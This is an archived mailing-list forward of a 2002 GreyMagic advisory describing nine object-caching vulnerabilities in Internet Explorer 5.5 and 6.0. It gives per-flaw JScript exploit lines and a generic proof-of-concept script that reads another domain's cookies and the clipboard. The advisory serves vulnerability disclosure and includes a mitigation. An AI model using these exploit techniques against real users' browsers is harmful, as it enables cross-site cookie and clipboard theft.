| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: lists.netsys.com at jscript.dk (Thor Larholm)
Subject: Fw: [VulnWatch] Vulnerable cached objects in IE (9 advisories in 1)
----- Original Message -----
From: "GreyMagic Software" <security@...ymagic.com>
To: <vulnwatch@...nwatch.org>
Sent: Tuesday, October 22, 2002 5:24 PM
Subject: [VulnWatch] Vulnerable cached objects in IE (9 advisories in 1)
> GreyMagic Security Advisory GM#012-IE
> =====================================
>
> By GreyMagic Software, Israel.
> 22 Oct 2002.
>
> Available in HTML format at http://security.greymagic.com/adv/gm012-ie/.
>
> Topic: Vulnerable cached objects in IE (9 advisories in 1).
>
> Discovery date: 4 Oct 2002, 17 Oct 2002, 21 Oct 2002.
>
> Affected applications:
> ======================
>
> Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are
not
> vulnerable.
>
> Note that any other application that uses Internet Explorer's engine
> (WebBrowser control) is affected as well (AOL Browser, MSN Explorer,
etc.).
>
>
> Introduction:
> =============
>
> When communicating between windows, security checks ensure that both pages
> are in the same security zone and on the same domain. These crucial
security
> checks wrongly assume that certain methods and objects are only going to
be
> called through their respective window. This assumption enables some
cached
> methods and objects to provide interoperability between otherwise
separated
> documents.
>
> Many security issues arise from storing references to objects that are
> supposed to be inaccessible when the page unloads. PivX lately disclosed
> such an issue in the <object> element, which left a valid reference in its
> "object" property.
>
> Discussion:
> ===========
>
> Through exhaustive research, we discovered nine vulnerabilities in
Internet
> Explorer involving object caching, most of them highly critical. We're
> grouping all of these vulnerabilities into this advisory in order to avoid
a
> flood and repetitive statements.
>
> Object caching takes place when the attacker opens a window to a page in
his
> own site. The URL in the window is then changed to the victim page, but
the
> cached references stay in place, providing direct access to the new
> document.
>
> All nine vulnerabilities are of the same general class (object caching).
> However, each of them is a separate vulnerability, which uses a unique
> method for exploitation.
>
> Each item in the list below consists of three parts, "Cache" shows how to
> cache the vulnerable object, "Exploit" shows how the vulnerability works
in
> context and "Impact" details the implications of the vulnerability.
>
> "Full access" means access to any page's Document Object Model in any
domain
> and any zone. The implications include (but not limited to) reading
cookies
> from any domain, forging content in any URL, reading local files and
> executing arbitrary programs.
>
>
> 1. showModalDialog
>
> Cache: var fVuln=oWin.showModalDialog;
> Exploit - IE 5.5:
> fVuln("javascript:alert(dialogArguments.document.cookie)",oWin,"");
> Exploit - IE 6: Not trivial but possible, by using our old "analyze.dlg"
> vulnerability.
> Impact: Full access in IE5.5, "My Computer" zone access in IE6.
>
>
> 2. external
>
> Cache: var oVuln=oWin.external;
> Exploit: oVuln.NavigateAndFind("javascript:alert(document.cookie)","","");
> Impact: Full access.
>
>
> 3. createRange
>
> Cache: var fVuln=oWin.document.selection.createRange;
> Exploit: fVuln().pasteHTML("<img
> src=\"javascript:alert(document.cookie)\">");
> Impact: Full access.
>
>
> 4. elementFromPoint
>
> Cache: var fVuln=oWin.document.elementFromPoint;
> Exploit: alert(fVuln(1,1).document.cookie);
> Impact: Full access.
>
>
> 5. getElementById
>
> Cache: var fVuln=oWin.document.getElementById;
> Exploit: alert(fVuln("ElementIdInNewDoc").document.cookie);
> Impact: Full access.
>
>
> 6. getElementsByName
>
> Cache: var fVuln=oWin.document.getElementsByName;
> Exploit: alert(fVuln("ElementNameInNewDoc")[0].document.cookie);
> Impact: Full access.
>
>
> 7. getElementsByTagName
>
> Cache: var fVuln=oWin.document.getElementsByTagName;
> Exploit: alert(fVuln("BODY")[0].document.cookie);
> Impact: Full access.
>
>
> 8. execCommand
>
> Cache: var fVuln=oWin.document.execCommand;
> Exploit: fVuln("SelectAll"); fVuln("Copy");
> alert(clipboardData.getData("text"));
> Impact: Read access to the loaded document.
>
>
> 9. clipboardData
>
> Cache: var oVuln=oWin.clipboardData;
> Exploit: alert(oVuln.getData("text")); or oVuln.setData("text","data");
> Impact: Read/write access to the clipboard, regardless of settings.
>
>
> IE 5 SP2 and IE6 SP1 are not vulnerable.
>
>
> Exploit:
> ========
>
> This generic exploit demonstrates how an attacker may read the client's
> "google.com" cookie using one of the cached objects above.
>
> <script language="jscript">
> var oWin=open("blank.html","victim","width=100,height=100");
> [Cache line here]
> location.href="http://google.com";
> setTimeout(
> function () {
> [Exploit line(s) here]
> },
> 3000
> );
> </script>
>
>
> Solution:
> =========
>
> Until a patch becomes available either disable Active Scripting or upgrade
> to IE6 SP1.
>
>
> Tested on:
> ==========
>
> IE5.5 Win98.
> IE5.5 NT4.
> IE6 Win98.
> IE6 Win2000.
> IE6 WinXP.
>
>
> Demonstration:
> ==============
>
> We put together a single nine-in-one proof of concept demonstration, which
> can be found at http://security.greymagic.com/adv/gm012-ie/.
>
>
> Feedback:
> =========
>
> Please mail any questions or comments to security@...ymagic.com.
>
> - Copyright ? 2002 GreyMagic Software.
>
Powered by blists - more mailing lists